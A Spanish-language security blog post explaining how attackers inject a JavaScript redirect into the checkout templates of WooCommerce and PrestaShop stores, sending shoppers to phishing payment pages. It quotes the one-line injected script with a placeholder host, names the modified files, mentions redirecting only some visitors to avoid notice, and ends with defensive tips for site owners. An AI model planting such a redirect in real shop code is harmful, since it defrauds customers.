SpamLoco


Sitios de ecommerce infectados en la página de pago o checkout

Siempre que realizo una compra online y en el carrito de compras soy redireccionado hacia otro lugar, como el sitio web de PayPal, presto mucha atención a la URL que se carga en el navegador por si termino en algún sitio falso.

Nunca he visto que algo así suceda, pero parece que los atacantes están comenzando a infectar sitios legítimos de ecommerce modificando únicamente las páginas de pago o checkout. Los detalles los comentan en el blog de Sucuri y es realmente interesante porque son ataques difíciles de detectar y que pueden resultar muy efectivos para los ciberdelincuentes.

phishing en ecommerce

La infección se realiza simplemente con un script que redirecciona hacia páginas falsas (phishing) cuando las víctimas intentan completar el pago en el sitio web del comercio.

<script>document.location="http://example.com/Checkout"</script>

Este script se ha detectado en sitios con WordPress que utilizan el clásico plugin de WooCommerce que permite montar una tienda fácilmente, la línea la colocan en el archivo form-checkout.php que se encuentra en /wp-content / plugins / woocommerce / templates / checkout/

También se ha detectado en otras plataformas como PrestaShop donde colocan el script malicioso en el archivo shopping-cart.tpl.

El ataque puede resultar muy efectivo para los delincuentes ya que los usuarios pueden sentirse confiados de realizar un pago luego de estar navegando por una tienda legítima. Y para los propietarios no es algo sencillo de detectar ya que la redirección se produce únicamente al momento de realizar el pago.

Incluso los delincuentes podrían mejorar el ataque y por ejemplo no redireccionar a todos los usuarios, sino a un pequeño porcentaje para que el propietario del ecommerce no note una baja importante en las ventas que le haga sospechar.

Consejos básicos para los webmasters: mantener todo actualizado, utilizar contraseñas fuertes, no utilizar themes o complementos de origen dudoso y eliminar aquellos que no se estén utilizando. También es útil utilizar complementos de seguridad que puedan chequear la integridad de los archivos importantes del sitio para detectar modificaciones no autorizadas.


1 estrella2 estrellas3 estrellas4 estrellas5 estrellas (¿Te ha servido el artículo?)
Publicado por el 18 agosto, 2016
Actualizado el 20 agosto, 2016 Archivado en: Seguridad


Comentar con Facebook


Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Suscripción al blog

Feed

Recibe los nuevos artículos del blog en tu correo suscribiéndote gratis:

Redes Sociales

facebook twitter spamloco-youtube google-plus-spamloco

Sobre SpamLoco

Este es un blog dedicado al mundo de la tecnología, internet y la seguridad informática. No te confundas con el nombre, sólo es un juego de palabras, no tiene nada que ver como el ''spam'' sino todo lo contrario.

Si necesitas ayuda puedes pasar por el Foro o contactarme.